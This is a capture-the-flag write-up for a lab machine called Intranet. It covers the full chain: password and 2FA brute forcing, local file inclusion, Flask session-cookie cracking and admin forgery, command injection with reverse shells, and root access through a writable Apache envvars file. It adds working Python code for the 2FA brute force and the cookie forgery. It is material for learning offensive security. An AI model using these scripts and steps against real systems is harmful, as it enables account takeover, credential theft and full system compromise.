Intranet Discussion [WRITE-UP]

Let’s discuss Intranet.

Recon and Initial Access

  1. Port Discovery
    Conduct an Nmap scan to identify open ports. Pay close attention to ports 80 and 8080 for web applications.

  2. Explore Web Application on Port 8080
    Visit the site on port 8080 and observe the login page. Inspect the source code for potential usernames.

  3. Password Cracking Preparation
    Create users.txt with the discovered usernames, including the likely admin e-mail address. Put a short list of candidate seed words in base.txt; the next steps expand it into the password list used for brute forcing.

  4. Modify /etc/hosts
    Map the machine's hostname to its IP in /etc/hosts so that hostname-based links and virtual hosts resolve.

  5. Generate Password Wordlist
    Run John the Ripper in wordlist mode with a custom rule (--wordlist=base.txt --rules=<rulename> --stdout) and redirect the output to a file; this expands each seed word in base.txt into the mangled candidates the rule defines.

  6. Brute Force Login Page
    Use Hydra's http-post-form module with users.txt and the generated password list. Hydra needs the failure string (or a success condition) from the login response to tell a valid pair from an invalid one; note the valid credentials it reports.
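
The rule-based expansion from step 5, as an added example rather than the write-up's own commands: a small John-style rule set (case changes, a leet substitution, appended digits and symbols) reproduced in Python so the mangling is visible and reproducible. The seed words, suffixes and output path are constructed sample data, not values from the target.

```python
"""Expand a few seed words into a password list, the way a John the Ripper rule does.

Added example, not the write-up's own commands. The write-up runs John with a custom rule
(john --wordlist=base.txt --rules=<name> --stdout); this reproduces a comparable rule set in
Python so the transformations are visible. Seed words and suffixes are constructed sample data.
"""
from typing import Iterable, List

SEED_WORDS = ["intranet", "welcome"]               # constructed stand-in for base.txt
SUFFIXES = ["", "1", "123", "!", "2023", "2023!"]  # constructed; roughly John's $1, Az"123", $! ...

# Leet substitution table (John's s-rules do this one character at a time).
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})


def case_variants(word: str) -> List[str]:
    """John rules l / c / u: lowercase, capitalise, uppercase (duplicates removed, order kept)."""
    variants = [word.lower(), word.capitalize(), word.upper()]
    return list(dict.fromkeys(variants))


def mangle(seeds: Iterable[str], suffixes: Iterable[str] = SUFFIXES) -> List[str]:
    """Every case variant plus the leet form of each seed, each with every suffix; de-duplicated."""
    out = []
    for word in seeds:
        stems = case_variants(word) + [word.lower().translate(LEET)]
        for stem in stems:
            for suffix in suffixes:
                out.append(stem + suffix)
    return list(dict.fromkeys(out))


def write_wordlist(path: str, words: Iterable[str]) -> int:
    """Write one candidate per line (the format Hydra's -P expects); returns the count written."""
    words = list(words)
    with open(path, "w") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    for candidate in mangle(SEED_WORDS):
        print(candidate)
```

Keep the seed list short: the candidate count is (case variants + 1) x suffixes per seed, and every candidate becomes one HTTP request per username when Hydra runs it against the login form.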

Two Factor Authentication

  1. 2FA Code Generation
    With valid credentials in hand, use Crunch to generate every 4-digit code (crunch 4 4 0123456789). That is only 10,000 candidates, which is practical as long as the endpoint does not lock the account or rate-limit attempts.

  2. Extract Session Cookie
    Capture the session cookie set after the password login (the write-up calls it a JWT; it is a signed Flask session cookie, which is why flask-unsign works on it later). Send it with every request to /sms so the attempts count against your half-authenticated session instead of starting a new login.

  3. Brute Force 2FA Code
    Run Wfuzz over the 4-digit list as the POST body, passing the session cookie with -b, and hide the failure response (by response length with --hh, or by status code with --hc) so the one response that differs reveals the correct code.
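
The 2FA brute force above, as an added example that is not part of the write-up (the write-up used crunch and wfuzz). It makes the two details that matter explicit: every attempt carries the session cookie issued after the password login, and success is decided from the response (here the redirect the application sends on a correct code) rather than from a fixed response length. The /sms path comes from the write-up; the cookie name session (Flask's default), the form field name code, the correct code 4821 and the FakeSmsEndpoint stand-in are constructed assumptions so the block runs offline.

```python
"""Brute-force a 4-digit second factor while reusing the authenticated session.

Added example, not the write-up's own commands. The /sms path is from the write-up; the
cookie name "session", the field name "code", the correct code 4821 and FakeSmsEndpoint
are constructed assumptions.
"""
from typing import Callable, Iterable, Iterator, Optional, Tuple
import urllib.error
import urllib.parse
import urllib.request

Response = Tuple[int, str]  # (HTTP status, response body)


def pin_candidates(width: int = 4) -> Iterator[str]:
    """Every zero-padded code, 0000..9999 for width 4: the list `crunch 4 4 0123456789` writes."""
    for n in range(10 ** width):
        yield f"{n:0{width}d}"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep the 3xx so it can serve as the success signal instead of being followed."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def make_http_poster(url: str, session_cookie: str, field: str = "code") -> Callable[[str], Response]:
    """post(code) -> (status, body) against the real endpoint, e.g. url="http://intranet:8080/sms"."""
    opener = urllib.request.build_opener(_NoRedirect())

    def post(code: str) -> Response:
        data = urllib.parse.urlencode({field: code}).encode()
        req = urllib.request.Request(url, data=data, method="POST",
                                     headers={"Cookie": f"session={session_cookie}"})
        try:
            with opener.open(req, timeout=10) as resp:
                return resp.getcode(), resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:   # 3xx/4xx land here because redirects are not followed
            return err.code, err.read().decode(errors="replace")
    return post


def redirected(status: int, body: str) -> bool:
    """Success heuristic: a correct code redirects to the dashboard; a wrong one re-renders the form."""
    return 300 <= status < 400


def brute_force_2fa(post: Callable[[str], Response], is_success: Callable[[int, str], bool],
                    candidates: Optional[Iterable[str]] = None) -> Optional[str]:
    """Try candidates in order and stop at the first accepted code; abort on a 429 rate limit."""
    for code in (candidates if candidates is not None else pin_candidates()):
        status, body = post(code)
        if status == 429:
            raise RuntimeError(f"rate limited at code {code}; slow down or re-authenticate")
        if is_success(status, body):
            return code
    return None


class FakeSmsEndpoint:
    """Constructed stand-in for /sms: 302 on the right code, 200 plus an error message otherwise."""
    def __init__(self, correct_code: str = "4821"):
        self.correct_code = correct_code
        self.attempts = 0

    def post(self, code: str) -> Response:
        self.attempts += 1
        if code == self.correct_code:
            return 302, ""
        return 200, "<p>Invalid code</p>"


if __name__ == "__main__":
    fake = FakeSmsEndpoint()
    print(brute_force_2fa(fake.post, redirected), "found after", fake.attempts, "attempts")
```

Against the real target, replace fake.post with make_http_poster(url, cookie_value).post-style callable and keep the same success test; if the application answers 200 for both outcomes, compare body length against a known-wrong attempt instead of relying on the redirect.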

Local File Inclusion and Source Code Access

  1. Identify LFI Vulnerability
    Test the parameter behind the Update button for local file inclusion, for example by supplying a path-traversal value such as ../../../../etc/passwd and checking whether file contents come back in the response.

  2. Read Sensitive File
    Exploit the LFI vulnerability to read the contents of /etc/passwd.

  3. Locate Application Source
    Because the LFI read is performed by the web application itself, /proc/self refers to the Flask process. /proc/self/stat gives its PID and command name, and /proc/self/cmdline gives the full command line including the path of the Python script; read app.py through the LFI using that path (or via the /proc/self/cwd symlink if the script was started from its own directory).
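
Parsing the two /proc/self files pulled through the LFI, as an added example that is not part of the write-up. Two details trip people up: /proc/self/cmdline is NUL-separated (it renders as one run-together string in a browser), and the command name in /proc/self/stat is parenthesised and may itself contain spaces or a ')', so it has to be split on the last ')'. The sample file contents and the path /var/www/intranet/app.py are constructed.

```python
"""Locate the application's source file from /proc/self reads made through the LFI.

Added example, not from the write-up. Sample contents and the path /var/www/intranet/app.py
are constructed.
"""
from typing import Dict, List, Optional

# Constructed samples of the two files as they would arrive through the LFI (stat truncated).
SAMPLE_STAT = b"1337 (python3) S 1 1337 1337 0 -1 4194560 2048 0 0 0 12 4 0 0 20 0 1 0 9876 123456 5000\n"
SAMPLE_CMDLINE = b"python3\x00/var/www/intranet/app.py\x00"


def parse_proc_stat(raw: bytes) -> Dict[str, object]:
    """Fields 1-4 of /proc/<pid>/stat: pid, (comm), state, ppid."""
    text = raw.decode("latin-1")
    lpar, rpar = text.index("("), text.rindex(")")   # rindex: comm may itself contain ')'
    rest = text[rpar + 1:].split()
    return {"pid": int(text[:lpar]), "comm": text[lpar + 1:rpar],
            "state": rest[0], "ppid": int(rest[1])}


def parse_proc_cmdline(raw: bytes) -> List[str]:
    """argv of the process; each argument is NUL-terminated."""
    if not raw:
        return []
    return [arg.decode("utf-8", "replace") for arg in raw.rstrip(b"\x00").split(b"\x00")]


def script_path_from_argv(argv: List[str]) -> Optional[str]:
    """The .py file the interpreter was started with. None for `python -m pkg` style launches,
    where FLASK_APP in /proc/self/environ is the next place to look."""
    for arg in argv[1:]:
        if arg.startswith("-"):          # interpreter flags such as -u
            continue
        return arg if arg.endswith(".py") else None
    return None


def lfi_paths_for_source(argv: List[str]) -> List[str]:
    """Path to request through the LFI: an absolute script path as-is, a relative one resolved
    through the /proc/self/cwd symlink, which the kernel follows during the open()."""
    script = script_path_from_argv(argv)
    if script is None:
        return []
    if script.startswith("/"):
        return [script]
    return ["/proc/self/cwd/" + script]


if __name__ == "__main__":
    print(parse_proc_stat(SAMPLE_STAT))
    print(lfi_paths_for_source(parse_proc_cmdline(SAMPLE_CMDLINE)))
```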

Cracking the Flask Secret Key

  1. Analyze Flask Application
    In app.py, find how the Flask SECRET_KEY that signs the session cookie is generated (again a Flask session cookie, not a JWT). If it is derived from a predictable base value, every possible key can be enumerated, which is what the next two steps rely on.

  2. Generate Secret Key Wordlist
    Create a flask_base.txt and utilize John to produce a wordlist containing possible secret keys.

  3. Crack the Session Cookie and Forge an Admin Session
    Run flask-unsign against the captured cookie with that wordlist (flask-unsign --unsign --cookie <cookie> --wordlist <wordlist>) to recover the secret; flask-unsign handles Flask's itsdangerous-signed session cookies, which is what this cookie is, not JWTs. Then re-sign the decoded session with the admin identity (flask-unsign --sign --cookie '<session dict>' --secret <secret>), replace the cookie in your browser, and confirm the application treats you as the logged-in admin.
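
What the cracking and forging steps actually do, as an added example that is not the write-up's commands or flask-unsign's code. The cookie the write-up calls a JWT is a Flask session cookie: base64url(JSON).base64url(timestamp).base64url(HMAC-SHA1), produced by itsdangerous with Flask's salt "cookie-session" and HMAC key derivation. Re-implementing the scheme shows exactly what flask-unsign checks for each wordlist entry (one HMAC per candidate, entirely offline, no requests to the target), what the cookie captured in the 2FA section carries, and how the session is re-signed as admin once the secret is known. The secret, the wordlist and the session fields (username, loggedin) are constructed assumptions, and timestamps follow the itsdangerous 2.x encoding.

```python
"""Sign, decode, crack and forge Flask session cookies (what flask-unsign does, spelled out).

Added example, not the write-up's commands. Secret, wordlist and session fields are constructed.
"""
import base64
import binascii
import hashlib
import hmac
import json
import time
import zlib
from typing import Dict, Iterable, Optional, Tuple

SALT = b"cookie-session"   # flask.sessions.SecureCookieSessionInterface.salt


def _b64e(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(enc: bytes) -> bytes:
    return base64.urlsafe_b64decode(enc + b"=" * (-len(enc) % 4))


def _mac(secret: bytes, value: bytes) -> bytes:
    """Flask passes key_derivation="hmac": key = HMAC-SHA1(secret, salt); tag = HMAC-SHA1(key, value)."""
    key = hmac.new(secret, SALT, hashlib.sha1).digest()
    return hmac.new(key, value, hashlib.sha1).digest()


def sign_session(secret: bytes, session: Dict, ts: Optional[int] = None) -> str:
    data = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(data)
    if len(compressed) < len(data) - 1:      # itsdangerous compresses only when it helps, marks it with "."
        payload = b"." + _b64e(compressed)
    else:
        payload = _b64e(data)
    ts = int(time.time()) if ts is None else ts
    value = payload + b"." + _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    return (value + b"." + _b64e(_mac(secret, value))).decode()


def _split(cookie: str) -> Tuple[bytes, bytes, bytes]:
    """-> (signed value, payload part, signature part)"""
    value, sig = cookie.encode().rsplit(b".", 1)
    return value, value.rsplit(b".", 1)[0], sig


def decode_payload(cookie: str) -> Dict:
    """Read the session without the secret (flask-unsign --decode): it is signed, not encrypted."""
    _, payload, _ = _split(cookie)
    raw = zlib.decompress(_b64d(payload[1:])) if payload.startswith(b".") else _b64d(payload)
    return json.loads(raw)


def verify(secret: bytes, cookie: str) -> bool:
    value, _, sig = _split(cookie)
    try:
        given = _b64d(sig)
    except (binascii.Error, ValueError):
        return False
    return hmac.compare_digest(_mac(secret, value), given)


def crack_secret(cookie: str, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """flask-unsign --unsign --wordlist: the first candidate whose MAC matches is the SECRET_KEY."""
    for candidate in wordlist:
        if verify(candidate, cookie):
            return candidate
    return None


def forge_admin(secret: bytes, captured_cookie: str) -> str:
    """flask-unsign --sign: keep the captured session's shape, change the identity, re-sign."""
    session = decode_payload(captured_cookie)
    session["username"] = "admin"          # the field name is an assumption about this app
    return sign_session(secret, session)


if __name__ == "__main__":
    cookie = sign_session(b"s3cr3t-base", {"loggedin": True, "username": "anders"})
    print(cookie, decode_payload(cookie), crack_secret(cookie, [b"admin", b"s3cr3t-base"]))
```

Because the MAC is computed over the payload and timestamp only, the attacker never needs to talk to the server while cracking; the speed limit is local HMAC throughput, which is why a SECRET_KEY built from a guessable base falls in seconds.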

Exploiting Admin Panel

  1. Post-Request Shell Injection
    Using the admin session, send a crafted cURL POST request to the admin endpoint whose parameter is passed to a shell, injecting a reverse shell command; URL-encode the payload so the shell metacharacters survive the request body.

  2. Set Reverse Shell Listener
    Start a listener on your machine (nc -lvnp <port>) before sending the request, so the callback from the admin panel is caught.

Lateral Movement and Privilege Escalation

  1. Investigate Apache Running User
    Confirm from the process list (ps aux) that Apache runs as the user anders rather than www-data, and check whether the Apache document root is writable from your current shell.

  2. Upload PHP Reverse Shell
    Transfer a PHP reverse shell into the writable document root (for example with nc), start a new listener, and request the file through Apache; because Apache runs as anders, the callback arrives as anders.

  3. Connect as User anders
    Use the shell to navigate and retrieve the second user flag from anders’s home directory.

  4. Sudo Permission for Apache Restart
    sudo -l shows that anders may restart the apache2 service as root. Look for files under /etc/apache2 that anders can write, since anything Apache's startup reads as root is then under your control.

  5. SSH Access via Key
    Add your SSH public key to /home/anders/.ssh/authorized_keys for a stable login as anders instead of the fragile reverse shell.

  6. Exploit Writable envvars File
    /etc/apache2/envvars is a shell script sourced by apache2ctl when the service starts, and the restart runs as root through sudo. Append a reverse shell command to it, start a listener, and restart Apache with sudo so your line executes as root.

  7. Capture Root Shell
    After the Apache restart, obtain a shell as root and retrieve the final flag from the /root/ directory.